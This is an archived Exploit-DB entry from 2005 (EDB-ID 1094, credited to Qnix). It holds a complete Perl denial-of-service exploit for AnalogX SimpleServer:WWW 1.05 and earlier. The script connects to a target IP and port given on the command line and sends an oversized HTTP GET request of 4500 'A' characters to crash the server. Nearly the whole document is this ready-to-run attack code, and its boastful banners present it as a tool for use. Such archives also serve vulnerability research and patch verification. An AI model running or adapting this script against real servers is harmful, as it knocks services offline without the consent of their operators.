AnalogX SimpleServer:WWW <= 1.05 - Denial of Service Exploit

2005-07-07T00:00:00
ID EDB-ID:1094
Type exploitdb
Reporter Qnix
Modified 2005-07-07T00:00:00

Description

AnalogX SimpleServer:WWW <= 1.05 Denial of Service Exploit. Dos exploit for windows platform

                                        
                                            #!/usr/bin/perl

use IO::Socket;

if (@ARGV &lt;2)
 {
  print "\n ::: ---------------------------------------------- :::\n";
  print " ::: AnalogX SimpleServer WWW 1.05 Dos Exploit     :::\n";
  print " :::                                                :::\n";
  print " ::: Advisory : http://www.ussrback.com/labs45.html :::\n";
  print " ::: By       : Qnix  - Qnix[at]bsdmail[dot]org     :::\n";
  print " :::                                                :::\n";
  print " ::: Usage:  analogx_dos.pl [ip] [port]             :::\n";
  print " ::: ---------------------------------------------- :::\n";
  exit();
 }

$buf="A"x4500;
print "\n &lt;+&gt; Prepare to start connect.\n";
sleep(1);
$s = IO::Socket::INET-&gt;new(Proto=&gt;"tcp",
                           PeerAddr=&gt;$ARGV[0],
                           PeerPort=&gt;$ARGV[1],
                           Timeout=&gt;6
                           ) or die " &lt;-&gt; Target web server already DoSeD ??? or can't connect :(\n\n";
 $s-&gt;autoflush();

print " &lt;+&gt; Connected to $ARGV[0]:$ARGV[1]\n";
sleep(1);
print " &lt;+&gt; Sending the devil shit.\n";
sleep(1);
print $s "GET /$buf HTTP/1.1\n";

print " &lt;+&gt; Prepare to DoS with AAAAAA's .\n";
sleep(1);
close($s);

print " &lt;+&gt; Ok now target web server maybe DoSeD.\n\n";

# milw0rm.com [2005-07-07]